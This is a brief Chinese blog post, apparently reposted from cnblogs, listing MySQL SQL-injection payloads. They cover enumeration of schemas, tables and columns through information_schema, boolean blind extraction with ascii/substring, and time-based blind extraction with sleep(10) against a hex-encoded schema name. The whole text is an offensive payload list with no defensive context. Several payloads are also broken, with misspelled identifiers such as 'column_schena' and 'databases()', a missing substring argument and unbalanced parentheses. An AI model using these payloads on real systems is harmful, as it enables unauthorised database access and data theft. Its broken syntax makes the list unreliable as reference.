标签:substring sch select and from color bst ring class
不定期更新。
Mysql Code:
#常规注入: select schema_name from information_schema.schemata; select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374; select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374; #盲注: select and ascii(mid(databases(),1,1))=115; select and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)); select and ascii(substring((select columns_name from information_schema.columns where column_schena=database() limit 1,1),1,1)); #延时盲注: select and if(ascii(substring(database(),1,)),sleep(10),1); select and if(ascii(substring((select table_name from information_schema.tables where table_schema=0x73716C696E6A656374),sleep(10),1)); select and if(ascii(substring((select columns_name from information_schema.columns where column_schema=0x73716C696E6A656374)),1,1),sleep(10),1)
标签:substring sch select and from color bst ring class
原文地址:http://www.cnblogs.com/xishaonian/p/6200818.html